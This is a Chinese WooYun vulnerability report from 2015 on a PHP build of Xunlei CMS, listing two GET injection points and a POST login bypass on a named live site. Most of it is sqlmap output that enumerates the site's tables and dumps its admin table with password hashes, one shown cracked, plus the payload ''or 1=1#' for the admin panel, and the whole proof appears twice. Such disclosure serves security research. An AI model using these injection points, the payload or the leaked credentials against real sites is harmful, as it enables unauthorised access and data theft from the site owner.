当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103460

漏洞标题:迅雷CMS#PHP版 两处Get注入+Post注入

相关厂商:迅雷CMS

漏洞作者: 浅蓝

提交时间:2015-03-31 15:27

修复时间:2015-05-15 15:28

公开时间:2015-05-15 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| data   | text    |
| huifu  | text    |
| id     | int(11) |
| name   | text    |
| ok     | int(11) |
| tel    | text    |
| text   | text    |
| title  | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | text         |
| id       | int(11)      |
| ly       | text         |
| text     | text         |
| title    | text         |
| titlepic | varchar(100) |
| type     | text         |
| voidurl  | varchar(255) |
| zz       | text         |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| text   | text    |
| title  | text    |
| type   | text    |
| typp   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| gwyq   | text    |
| id     | int(11) |
| jzrq   | text    |
| lxfs   | text    |
| nl     | text    |
| rs     | text    |
| xb     | text    |
| xl     | text    |
| yx     | text    |
| zpzw   | text    |
| zwmc   | text    |
| zygl   | text    |
| zyyq   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| foot   | text    |
| id     | int(11) |
| query1 | text    |
| query2 | text    |
| title  | text    |
| url    | text    |
+--------+---------+


Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password                                   |
+----------+--------------------------------------------+
| admin    | 3578ff997a31c61033122d17322858bd           |
| admin1   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44


X}FJ_E5)M15$O@32J1R@]MR.png


# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

QLF0CUH$995@11}_BVLS$86.png


账号'or 1=1# 密码随意

H@9N1JSPH{R`012N6CVUD$S.png

漏洞证明:

迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| data   | text    |
| huifu  | text    |
| id     | int(11) |
| name   | text    |
| ok     | int(11) |
| tel    | text    |
| text   | text    |
| title  | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | text         |
| id       | int(11)      |
| ly       | text         |
| text     | text         |
| title    | text         |
| titlepic | varchar(100) |
| type     | text         |
| voidurl  | varchar(255) |
| zz       | text         |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| text   | text    |
| title  | text    |
| type   | text    |
| typp   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| gwyq   | text    |
| id     | int(11) |
| jzrq   | text    |
| lxfs   | text    |
| nl     | text    |
| rs     | text    |
| xb     | text    |
| xl     | text    |
| yx     | text    |
| zpzw   | text    |
| zwmc   | text    |
| zygl   | text    |
| zyyq   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| foot   | text    |
| id     | int(11) |
| query1 | text    |
| query2 | text    |
| title  | text    |
| url    | text    |
+--------+---------+


Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password                                   |
+----------+--------------------------------------------+
| admin    | 3578ff997a31c61033122d17322858bd           |
| admin1   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file
 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gon
gjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44


X}FJ_E5)M15$O@32J1R@]MR.png


# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台

QLF0CUH$995@11}_BVLS$86.png


账号'or 1=1# 密码随意

H@9N1JSPH{R`012N6CVUD$S.png

修复方案:

转义

版权声明:转载请注明来源 浅蓝@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝